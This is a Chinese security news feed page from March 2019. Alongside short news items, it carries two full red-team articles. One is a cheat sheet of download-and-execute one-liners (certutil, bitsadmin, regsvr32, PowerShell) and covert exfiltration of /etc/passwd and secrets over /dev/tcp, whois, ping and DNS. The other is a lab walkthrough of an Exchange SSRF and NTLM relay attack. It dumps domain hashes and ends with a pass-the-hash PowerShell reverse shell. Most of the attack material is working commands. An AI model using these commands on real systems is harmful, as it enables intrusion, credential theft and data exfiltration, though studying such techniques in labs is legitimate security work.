News stories from Tuesday 12 March, 2019

Favicon for 游侠安全网 21:23 收藏 · 备查:勒索病毒的分类收集 » Post from 游侠安全网 Visit off-site link
截止2019年3月份,常见勒索病毒及相关信息收集: 1、Phobos病毒 中毒特征:<原文件名>.ID-<随机8位字符串>.<邮件地址>.Phobos 勒索信息:Encrypted.txt Phobos.hta data.hta 特征示例: readme.txt.ID-16E86DC7.[grunresri ...
Favicon for 游侠安全网 13:59 中国人民银行网络安全技能大赛—四叶草安全提供技术支撑 » Post from 游侠安全网 Visit off-site link
2019年3月5日-8日,中国人民银行南京分行网络安全技能大赛在中国人民银行南京分行举行。

News stories from Monday 11 March, 2019

Favicon for 游侠安全网 20:57 马杜罗:委内瑞拉电力系统再遭攻击 再次大停电 » Post from 游侠安全网 Visit off-site link
新闻:新华社加拉加斯3月9日电 委内瑞拉总统马杜罗9日在首都加拉加斯表示,委电力系统当天再次遭受攻击,委内瑞拉一共有23个州,21个州以及首都均遭遇大规模断电,电力供应恢复受到极大影响。
Favicon for 游侠安全网 09:49 【安全帮】闲鱼平台信用卡假卡制造工具被售卖,200元各国信用卡随便挑 » Post from 游侠安全网 Visit off-site link
微软起诉鸿海违反专利授权协议 要求补缴专利费 3月10日消息,微软对富士康母公司鸿海提起诉讼,称这家消费电子制造商自2013年以来未能遵守一项专利授权协议。在周五提交给法庭的文件中,微软指控富士康未能就某些产品提供每年两次的专利费报告。这起诉 ...

News stories from Sunday 10 March, 2019

Favicon for 游侠安全网 09:22 【安全帮】研究人员发现4G和5G通信网络中的新型通话拦截和位置追踪漏洞 » Post from 游侠安全网 Visit off-site link
北京警方严打电信诈骗,今年前两月挽回损失1亿余元 记者9日从北京市公安局开展的打击防范电信网络诈骗犯罪拦截资金返还暨防范宣传活动上获悉,2019年以来,警方共劝阻事主2.5万余人次,挽回民众损失1亿余元(人民币,下同);冻结涉案账户10万余个,冻结 ...

News stories from Saturday 09 March, 2019

Favicon for 游侠安全网 15:34 华为告美国政府|国家级网络对抗分析 » Post from 游侠安全网 Visit off-site link
如今,国家间的网络对抗已越来越常见了!   01华为VS美国政府 3月7日,华为深圳总部宣布:起诉美国政府。指控美国2019年国防授权法第889条款(限制华为销售)违反了美国宪法。另外,华为还透露,有证据表明美国政府涉嫌非法入侵华为服务器 ...
Favicon for 游侠安全网 09:13 【安全帮】新型信息窃取恶意软件,主攻亚太地区Windows服务器 » Post from 游侠安全网 Visit off-site link
电邮验证服务泄漏 8 亿电邮地址 安全研究员 Bob Diachenko 和 Vinny Troia 上周发现了一个没有密码保护的 MongoDB 数据库,包含了150GB数据,其中包括7.63亿唯一电邮地址,部分数据还包含个人身份信息。该数据库的所有者是的电邮验证公司 Verification ...

News stories from Friday 08 March, 2019

Favicon for 游侠安全网 16:55 Verifications.io遭遇数据库泄露 邮件地址等8亿记录被曝光 » Post from 游侠安全网 Visit off-site link
Security Discovery 安全研究人员 Bob Diachenko,刚刚披露了一个可被公开访问的 MongoDB 数据库,其中包含了超过 8.08 亿个电子邮件地址、以及其它纯文本记录。数据库大小为 150GB,剩余的是涉及个人信息的数据缓存。该漏洞与 Verifications.io 的电子邮 ...
Favicon for 游侠安全网 09:49 【安全帮】年底可随意“携号转网”:隐形门槛该消失了 » Post from 游侠安全网 Visit off-site link
专家破解了“已故” QuadrigaCX CEO 的笔记本电脑,但一无所获 加拿大交易所 Quadriga 超过一亿美元资金去向何处日益成谜。该交易所 30 岁 CEO Gerald Cotten 去年底在印度突然死亡,交易所冷钱包密钥据称只有他一人掌握,而冷钱包内据称有价值 1.9 亿加 ...
Favicon for 游侠安全网 09:38 数据库审计产品中的应用审计视角 » Post from 游侠安全网 Visit off-site link
目前市面上的数据库审计产品,大多是以SQL语句、风险、数据库会话为视角去溯源“数据被谁访问”。随着由安华金和2016年在国内提出的“数据安全治理”理念的逐步落地,基于“谁访问了哪些数据”的以应用发起者为出发点,通过哪些业务的应用模块,最终访问了数据 ...

News stories from Tuesday 05 March, 2019

Favicon for 知道创宇 16:53 红队后渗透测试中的文件传输技巧 » Post from 知道创宇 Visit off-site link

作者:xax007@知道创宇404 ScanV安全服务团队
作者博客:https://xax007.github.io/

在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙、IDS、IPS等报警和监控系统进行文件传输,本文列出了多种利用操作系统默认自带的工具进行文件传输的方法。

搭建 HTTP server

Python

python2:

python -m SimpleHTTPServer 1337

以上命令会在当前目录启动 HTTP 服务,端口为 1337

python3:

python -m http.server 1337

以上命令会在当前目录启动 HTTP 服务,端口为 1337

PHP 5.4+

当 PHP 版本大于 5.4 是,可使用 PHP 在当前目录启动 HTTP 服务,端口为 1337

php -S 0.0.0.0:1337

Ruby

下面的命令会在当前目录下启动 HTTP 服务,端口为 1337

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port =&gt; 1337, :DocumentRoot =&gt; Dir.pwd).start'

Ruby 1.9.2+

ruby -run -e httpd . -p 1337

Perl

<span class="nt">perl</span> <span class="nt">-MHTTP</span><span class="p">::</span><span class="nd">Server</span><span class="p">::</span><span class="nd">Brick</span> <span class="nt">-e</span> <span class="s1">'$s=HTTP::Server::Brick-&gt;new(port=&gt;1337); $s-&gt;mount("/"=&gt;{path=&gt;"."}); $s-&gt;start'</span>
<span class="nt">perl</span> <span class="nt">-MIO</span><span class="p">::</span><span class="nd">All</span> <span class="nt">-e</span> <span class="s1">'io(":8080")-&gt;fork-&gt;accept-&gt;(sub { $_</span><span class="cp">[</span><span class="mi">0</span><span class="cp">]</span><span class="s1"> &lt; io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'</span>

Thanks to: http://stackoverflow.com/questions/8058793/single-line-python-webserver

busybox httpd

busybox httpd -f -p 8000

本条来自:lvm

Download files from HTTP server

以下列出了在 Windows 和 Linux 系统下使用系统自带工具从 HTTP Server 下载文件的几种方法

Windows

powershell

下载并执行:

<span class="nt">powershell</span> <span class="o">(</span><span class="nt">new-object</span> <span class="nt">System</span><span class="p">.</span><span class="nc">Net</span><span class="p">.</span><span class="nc">WebClient</span><span class="o">)</span><span class="p">.</span><span class="nc">DownloadFile</span><span class="o">(</span><span class="s1">'http://1.2.3.4/5.exe'</span><span class="o">,</span><span class="s1">'c:\download\a.exe'</span><span class="o">);</span><span class="nt">start-process</span> <span class="s1">'c:\download\a.exe'</span>

certutil

下载并执行:

certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&amp;&amp;c:\download\a.exe

bitsadmin

下载并执行:

bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe &amp;&amp; c:\download\a.exe

bitsadmin 的下载速度比较慢

regsvr32

regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll

Linux

Curl

curl http://1.2.3.4/backdoor

Wget

wget http://1.2.3.4/backdoor

awk

在使用 awk 进行下载文件时,首先使用以上列出的任意一条命令启动一个 HTTP Server

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/1337"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n"    |&amp; HTTPCon
  while (HTTPCon |&amp; getline &gt; 0)
      print $0
  close(HTTPCon)
}'

效果:

img

Setup HTTP PUT server

以下列出了上传文件到 HTTP Server 的几种方法

使用 Nginx 搭建 HTTP PUT Server

mkdir -p /var/www/upload/ # 创建目录 
chown www-data:www-data /var/www/upload/ # 修改目录所属用户和组
cd /etc/nginx/sites-available # 进入 nginx 虚拟主机目录

# 写入配置到 file_upload 文件
cat &lt;&lt;EOF &gt; file_upload
server {
    listen 8001 default_server;
    server_name kali;
        location / {
        root /var/www/upload;
        dav_methods PUT;
    }
}
EOF
# 写入完毕
cd ../sites-enable # 进入 nginx 虚拟主机启动目录
ln -s /etc/nginx/sites-available/file_upload file_upload # 启用 file_upload 虚拟主机
systemctl start nginx # 启动 Nginx

使用 Python 搭建 HTTP PUT Server

以下代码保存到 HTTPutServer.py 文件里:

<span class="c1"># ref: https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">signal</span>
<span class="kn">from</span> <span class="nn">threading</span> <span class="kn">import</span> <span class="n">Thread</span>
<span class="kn">from</span> <span class="nn">BaseHTTPServer</span> <span class="kn">import</span> <span class="n">HTTPServer</span><span class="p">,</span> <span class="n">BaseHTTPRequestHandler</span>



<span class="k">class</span> <span class="nc">PUTHandler</span><span class="p">(</span><span class="n">BaseHTTPRequestHandler</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">do_PUT</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="n">length</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s1">'Content-Length'</span><span class="p">])</span>
        <span class="n">content</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">rfile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="n">length</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">send_response</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span>
        <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">path</span><span class="p">[</span><span class="mi">1</span><span class="p">:],</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
            <span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">content</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">run_on</span><span class="p">(</span><span class="n">port</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="s2">"Starting a HTTP PUT Server on {0} port {1} (http://{0}:{1}) ..."</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">port</span><span class="p">))</span>
    <span class="n">server_address</span> <span class="o">=</span> <span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">port</span><span class="p">)</span>
    <span class="n">httpd</span> <span class="o">=</span> <span class="n">HTTPServer</span><span class="p">(</span><span class="n">server_address</span><span class="p">,</span> <span class="n">PUTHandler</span><span class="p">)</span>
    <span class="n">httpd</span><span class="o">.</span><span class="n">serve_forever</span><span class="p">()</span>


<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s2">"Usage:</span><span class="se">\n\t</span><span class="s2">python {0} ip 1337"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">ports</span> <span class="o">=</span> <span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">arg</span><span class="p">)</span> <span class="k">for</span> <span class="n">arg</span> <span class="ow">in</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">:]]</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">port_number</span> <span class="ow">in</span> <span class="n">ports</span><span class="p">:</span>
            <span class="n">server</span> <span class="o">=</span> <span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">run_on</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">[</span><span class="n">port_number</span><span class="p">])</span>
            <span class="n">server</span><span class="o">.</span><span class="n">daemon</span> <span class="o">=</span> <span class="bp">True</span> <span class="c1"># Do not make us wait for you to exit</span>
        <span class="n">server</span><span class="o">.</span><span class="n">start</span><span class="p">()</span>
        <span class="n">signal</span><span class="o">.</span><span class="n">pause</span><span class="p">()</span> <span class="c1"># Wait for interrupt signal, e.g. KeyboardInterrupt</span>
    <span class="k">except</span> <span class="ne">KeyboardInterrupt</span><span class="p">:</span>
        <span class="k">print</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">Python HTTP PUT Server Stoped."</span>
        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

运行方法:

$ python HTTPutServer.py <span class="m">10</span>.10.10.100 <span class="m">1337</span>
Starting a HTTP PUT Server on <span class="m">10</span>.10.10.100 port <span class="m">1337</span> <span class="o">(</span>http://10.10.10.100:1337<span class="o">)</span> ...

上传文件到 HTTP PUT server

Linux

Curl

$ curl --upload-file secret.txt http://ip:port/

Wget

$ wget --method<span class="o">=</span>PUT --post-file<span class="o">=</span>secret.txt http://ip:port/

Windows

Powershell

$body = Get-Content secret.txt
Invoke-RestMethod -Uri http://ip:port/secret.txt -Method PUT -Body $body

使用 Bash /dev/tcp 进行文件传输

首先需要监听端口

文件接收端:

nc -lvnp 1337 &gt; secret.txt

文件发送端:

cat secret.txt &gt; /dev/tcp/ip/port

img

使用 SMB 协议进行文件传输

搭建简易 SMB Server

搭建简易SMB Server 需要用到 Impacket 项目的 smbserver.py 文件

Impacket 已默认安装在 Kali Linux 系统中

syntax: impacker-smbserver ShareName SharePath

$ mkdir smb <span class="c1"># 创建 smb 目录</span>
$ <span class="nb">cd</span> smb <span class="c1"># 进入 smb目录</span>
$ impacket-smbserver share <span class="sb">`</span><span class="nb">pwd</span><span class="sb">`</span> <span class="c1"># 在当前目录启动 SMB server,共享名称为 share</span>

效果:

img

从 SMB server 下载文件

copy \\IP\ShareName\file.exe file.exe

上传文件到 SMB server

net use x: \\IP\ShareName

copy file.txt x:

net use x: /delete

使用 whois 命令进行文件传输

/etc/passwd
Host A
Host B

接收端 Host B:

nc -vlnp 1337 | sed "s/ //g" | base64 -d

发送端 Host A:

whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64`

效果:

img

使用 ping 命令进行文件传输

secret.txt
Sender
Reciver

发送端:

xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

接收端:

以下代码保存到 ping_receiver.py

<span class="kn">import</span> <span class="nn">sys</span>

<span class="k">try</span><span class="p">:</span>
    <span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s2">"Scapy not found, please install scapy: pip install scapy"</span><span class="p">)</span>
    <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">process_packet</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="o">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">ICMP</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">pkt</span><span class="p">[</span><span class="n">ICMP</span><span class="p">]</span><span class="o">.</span><span class="n">type</span> <span class="o">==</span> <span class="mi">8</span><span class="p">:</span>
            <span class="n">data</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">[</span><span class="n">ICMP</span><span class="p">]</span><span class="o">.</span><span class="n">load</span><span class="p">[</span><span class="o">-</span><span class="mi">4</span><span class="p">:]</span>
            <span class="k">print</span><span class="p">(</span><span class="n">f</span><span class="s1">'{data.decode("utf-8")}'</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s2">""</span><span class="p">,</span> <span class="n">sep</span><span class="o">=</span><span class="s2">""</span><span class="p">)</span>

<span class="n">sniff</span><span class="p">(</span><span class="n">iface</span><span class="o">=</span><span class="s2">"eth0"</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">process_packet</span><span class="p">)</span>

执行方法:

python3 ping_receiver.py

效果

使用 dig 命令进行文件传输

/etc/passwd
Sender
Reciver

发送端:

<span class="n">xxd</span> <span class="o">-</span><span class="n">p</span> <span class="o">-</span><span class="n">c</span> <span class="mi">31</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">passwd</span> <span class="o">|</span> <span class="k">while</span> <span class="n">read</span> <span class="n">line</span><span class="p">;</span> <span class="k">do</span> <span class="n">dig</span> <span class="mf">@172.16.1.100</span> <span class="o">+</span><span class="kt">short</span> <span class="o">+</span><span class="n">tries</span><span class="o">=</span><span class="mi">1</span> <span class="o">+</span><span class="n">time</span><span class="o">=</span><span class="mi">1</span> <span class="err">$</span><span class="n">line</span><span class="p">.</span><span class="n">gooogle</span><span class="p">.</span><span class="n">com</span><span class="p">;</span> <span class="n">done</span>

接收端:

以下代码使用了 python 的 scapy 模块,需要手动安装

代码保存到 dns_reciver.py 文件中

<span class="nn">try</span><span class="p">:</span>
    <span class="s s-Atom">from</span> <span class="s s-Atom">scapy</span><span class="p">.</span><span class="s s-Atom">all</span> <span class="s s-Atom">import</span> <span class="o">*</span>
<span class="nn">except</span><span class="p">:</span>
    <span class="nf">print</span><span class="p">(</span><span class="s2">"Scapy not found, please install scapy: pip install scapy"</span><span class="p">)</span>

<span class="s s-Atom">def</span> <span class="nf">process_packet</span><span class="p">(</span><span class="s s-Atom">pkt</span><span class="p">)</span><span class="s s-Atom">:</span>
    <span class="s s-Atom">if</span> <span class="s s-Atom">pkt</span><span class="p">.</span><span class="nf">haslayer</span><span class="p">(</span><span class="nv">DNS</span><span class="p">)</span><span class="s s-Atom">:</span>
        <span class="s s-Atom">domain</span> <span class="o">=</span> <span class="s s-Atom">pkt</span><span class="p">[</span><span class="nv">DNS</span><span class="p">][</span><span class="nv">DNSQR</span><span class="p">].</span><span class="s s-Atom">qname</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="s s-Atom">'utf-8'</span><span class="p">)</span>
        <span class="s s-Atom">root_domain</span> <span class="o">=</span> <span class="s s-Atom">domain</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="s s-Atom">'.'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
        <span class="s s-Atom">if</span> <span class="s s-Atom">root_domain</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="s s-Atom">'gooogle'</span><span class="p">)</span><span class="s s-Atom">:</span>
            <span class="nf">print</span><span class="p">(</span><span class="s s-Atom">f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}'</span><span class="p">,</span> <span class="s s-Atom">flush</span><span class="o">=</span><span class="nv">True</span><span class="p">,</span> <span class="s s-Atom">end=''</span><span class="p">)</span>

<span class="nf">sniff</span><span class="p">(</span><span class="s s-Atom">iface=</span><span class="s2">"eth0"</span><span class="p">,</span> <span class="s s-Atom">prn</span><span class="o">=</span><span class="s s-Atom">process_packet</span><span class="p">)</span>

运行方法:

python3 dns_reciver.py

效果:

Transfer files via dig

img

使用 NetCat 进行文件传输

1.txt
A:10.10.10.100
B:10.10.10.200

接受端:

nc -l -p 1337 &gt; 1.txt

发送端:

cat 1.txt | nc -l -p 1337

或者

nc 10.10.10.200 1337 &lt; 1.txt

在极端环境下,如果接受端没有 nc 可以使用 Bash 的 /dev/tcp 接收文件:

cat &lt; /dev/tcp/10.10.10.200/1337 &gt; 1.txt

img

参考链接


Paper

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/834/

Favicon for 知道创宇 16:52 利用 Exchange SSRF 漏洞和 NTLM 中继沦陷域控 » Post from 知道创宇 Visit off-site link

作者:xax007@知道创宇404 ScanV安全服务团队
作者博客:https://xax007.github.io/

漏洞简述

在群里看到一篇分享的利用 Exchange SSRF 漏洞获取域控 的文章(中文翻译),让我眼前一亮,后来又在微博看到有大佬复现了这个漏洞,于是我也决定试试。

上文中的漏洞利用思路按照我的理解可以汇总成一句话就是:

在Exchange 在域内具有高权限的前提下条件下,利用 Exchange 的跨站请求伪造漏洞进行 NTLM 中继攻击,修改域 ACL 使普通用户具有域管理员同等级别的权限

这篇文章的利用手法和其他网上很多方法不同的点在于,对 SSRF 漏洞进一步利用达到了拿到域控的目的,其他文章里都仅仅是利用SSRF 漏洞查看管理的邮件或者修改管理员邮箱规则,如邮件自动转发等。

不想拿到域控的黑阔不是一个好黑阔,利用多个普通漏洞,最大化利用漏洞拿到域控的骚姿势肯定要学一下的,于是有了这篇文章。

此文记录了我对这个漏洞进行的所有工作和遇到的坑。

漏洞环境搭建

复现这个漏洞最费时间又麻烦的就是搭建环境,我在 MacOS上 使用 Vmware Fusion 搭建了此漏洞需要的域环境

VMware Fusion 会在系统安装两个虚拟网卡,分别为 vmnet1 和 vmnet8

vmnet8 为 NAT网卡,可以让虚拟机上网 vmnet1 为 HostOnly 仅主机网卡,用来搭建私有网络,我们需要对此网卡作出修改

如果在Windows系统搭建环境时,也应该设置所有虚拟主机为 HostOnly 模式,方法大同小异

配置 Vmware Fusion

修改 /Library/Preferences/VMware\ Fusion/networking 文件

关闭 vmnet1的 dhcp,否则虚拟主机之间无法通信

VERSION=1,0
answer VNET_1_DHCP no    #关闭dhcp
answer VNET_1_DHCP_CFG_HASH 9503E18413CDE50A84F0D124C42535C62DF8193B
answer VNET_1_HOSTONLY_NETMASK 255.255.255.0 # HostOnly 网络子网掩码
answer VNET_1_HOSTONLY_SUBNET 10.10.10.0     # HostOnly网络地址
answer VNET_1_VIRTUAL_ADAPTER yes

可参考:MAC下VMware Fusion虚拟机配置网卡

搭建域环境

这里可以下载到能免费试用180天的正版 Windows Server 2012 系统

我安装了一台 Windows Server 2012,装好以后克隆了一台,给虚拟分配多少硬件资源取决于自身电脑配置,这里我电脑的配置

img

因为是克隆的系统,两台的SID是一样的,会加入不了域, 所以克隆的这台要修改 SID

修改 SID 的方法是,在克隆的那个系统里进入 c:\windows\system32\sysprep\ 执行

sysprep /generalize

按照提示操作,重启就修改好了。

最终各种查资料、看不懂、迷惘、折腾后搭好了可用的域环境。

域环境的搭建主要参考了几位大佬的以下几篇文章

搭建渗透测试活动目录教程1

搭建渗透测试活动目录教程2

当然还有 l3mOn 大佬的:

Microsoft Exchange漏洞记录(撸向域控) - CVE-2018-8581

同步域内系统时间

搭建小型域环境里大佬说同步时间很重要,我发现我两个系统的时间都不一样,所以在域控所在的服务器配置系统时间:

打开 powershell 并执行

w32tm /config /manualpeerlist:"cn.pool.ntp.org tw.pool.ntp.org" /syncfromflags:manual /reliable:yes /update

其中

/manualpeerlist 表示外部时间源服务器列表,多个服务器之间可用空格分隔,cn.pool.ntp.org 和 tw.pool.ntp.org是 NTP 时间服务器

/syncfromflags:manual 表示与指定的外部时间源服务器列表中的服务器进行同步

/reliable:yes 表示设置此计算机是一个可靠的时间源

/update 表示向时间服务发出配置已更改的通知,使更改生效

net stop w32time         关闭w32time服务

net start w32time         启动w32time服务

w32tm /resync             手动与外部时间源服务器进行同步

w32tm /query /status   同步时间服务器状态

w32tm /query /source  查询时间同步源

w32tm /query /peers    查询时间同步服务器及相关信息

以上步骤参考了以下的文章

Windows server 2012 部署NTP,实现成员服务器及客户端时间与域控制器时间同步

我按照教程在域控所在的服务器执行到第三步,另一台服务器的时间自己就同步了

最终搭好了可用的域环境:

域名称:evilcorp.local
域控:
  操作系统:Windows Server 2012 R2 
  IP: 10.10.10.2
  子网掩码: 255.255.255.0
  网关: 10.10.10.1
  DNS: 10.10.10.2
Exchange 服务器:
  操作系统: Windows Server 2012 R2
  IP: 10.10.10.3
  子网掩码: 255.255.255.0
  网关: 10.10.10.1
  DNS: 10.10.10.2
攻击主机:
  操作系统: Kali
  IP: 10.10.10.5

按照以上三个教程的步骤走,看不明白继续搜教程就可以搭好域环境

攻击主机 Kali Linux 为了能访问域网络需要添加一个 HostOnly 网卡,我添加后的网卡名为 eth1

然后进行以下配置

╭─root@kali ~  
╰─?  ifconfig eth1 up
╭─root@kali ~  
╰─?  ifconfig eth1 10.10.10.5 netmask 255.255.255.0
╭─root@kali ~  
╰─?  route add default gw 10.10.10.1 eth1
╭─root@kali ~  
╰─?

安装 Exchange Server 2013

首先需要在 Exchange 所在的服务器上使用域控 Administrator 账号登录,不然安装检查是会出现一大堆错误

安装 Exchange 前要装依赖组件,可以参考上面 l3m0n 大佬的文章和 Windows Server 2012 安装 Exchange 2013 这两篇文章

安装好 Exchange 以后访问 Exchange 页面,在我的环境里的地址是 https://10.10.10.3 ,需要添加一个普通域用户,然后用域控管理员账号登录 Exchange 为此用户分配 Exchange 账号,这一步网上有很多教程

后续要用此普通用户来提权

所有的环境搭建好以后要进入激动人心的漏洞利用环节了!!!

漏洞利用

准备工具

漏洞利用需要下载两个工具:

第二个 Impacket 是一个功能很强大的 Windows 网络(SMB, MSRPC)工具包

Kali 自带 Impacket,是版本过时了,需要安装最新的

git clone 下载下来后,进入到 Impacket 目录使用 pip 安装

pip install .

注意这个工具是 python2 写的,使用 python3会出错

发起攻击

首先在本机启动 NTLM 中继,进入到 Impacker 的 examples 目录执行

python ntlmrelayx.py -t ldap://evilcorp.local --escalate-user mr.robot

其中

evilcorp.local 是域的名称

--escalate-user 的参数是 Exchange 的普通权限用户名,也就是之前添加的普通用户用户名

然后执行提权脚本

python privexchange.py -ah 10.10.10.1 10.10.10.3 -u mr.robot -p "Hacktheplanet\!" -d evilcorp.local

其中

-ah 参数指定域控地址可以是域的名称或 IP 地址,在这里为 10.10.10.1 10.10.10.3 为 Exchange 服务器在域的名称或者IP地址 -u 指定需要提权的 Exchange 的普通权限用户名 -p指定 Exchange 的普通权限用户的密码 -d 指定域的名称

如果攻击成功你会看到 privexchange.py 脚本的输出

img

至此在 evicorp.local 域内, Mr.robot 用户具有了高权限,下一步我们导出域内所有用户的哈希

导出域内用户哈希

进入 Impacket\examples 目录执行

python secretsdump.py EVILCORP.LOCAL/mr\.robot@evilcorp.local -just-dc

就导出了域内所有用户哈希

img

在截图中由于 Kali 的 Openssl 版本太新有 bug,没办法连接上 Exchange 服务器使用自签名证书的HTTPS服务,在本机的 MacOS 上测试的

我再一次得到一个教训

平时没事别瞎更新整个系统,要更新也只更新需要的部分

利用用户哈希反弹 shell

哈希都拿到了,尝试反弹shell,使用 Windows 帐户哈希反弹 shell 的工具很多,我使用 smbmap

smbmap 已内置在Kali Linux

nc 监听端口

nc -lvnp 1337

反弹 shell

<span class="nt">smbmap</span> <span class="nt">-d</span> <span class="nt">evilcorp</span><span class="p">.</span><span class="nc">local</span> <span class="nt">-u</span> <span class="nt">Administrator</span> <span class="nt">-p</span> <span class="s1">'aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889'</span> <span class="nt">-H</span> <span class="nt">10</span><span class="p">.</span><span class="nc">10</span><span class="p">.</span><span class="nc">10</span><span class="p">.</span><span class="nc">2</span> <span class="nt">-x</span> <span class="s1">'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""10.10.10.5""""; $port=""""1337"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte</span><span class="cp">[]</span><span class="s1"> $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb</span><span class="cp">[</span><span class="mi">0</span><span class="nx">..</span><span class="err">$</span><span class="p">(</span><span class="nv">$pos</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="cp">]</span><span class="s1"> -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'</span>

img

代码中的 10.10.10.5 修改为攻击者IP,1337 修改为NC监听端口


Paper

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/833/

News stories from Thursday 28 February, 2019

Favicon for 知道创宇 17:41 ES 文件浏览器安全漏洞分析(CVE-2019-6447) » Post from 知道创宇 Visit off-site link

作者:0x7F@知道创宇404实验室
时间:2019.02.27

0x00 前言

ES 文件浏览器(ES File Explorer File Manager application)是一款安卓系统上的文件管理器,它支持在手机上浏览、管理文件。有超过 1 亿次下载量,是目前安卓系统上使用得最广的文件管理器。

2019年1月,由国外安全研究者公开一个关于 ES 文件浏览器的安全漏洞(CVE-2019-6447)。

2月下旬,笔者浏览到该漏洞的相关文章,想借此机会学习 APK 逆向,随即对该漏洞进行了复现分析,结合已公开的分析文章,发现原理非常简单,下面就来一探究竟吧。

0x01 漏洞概述

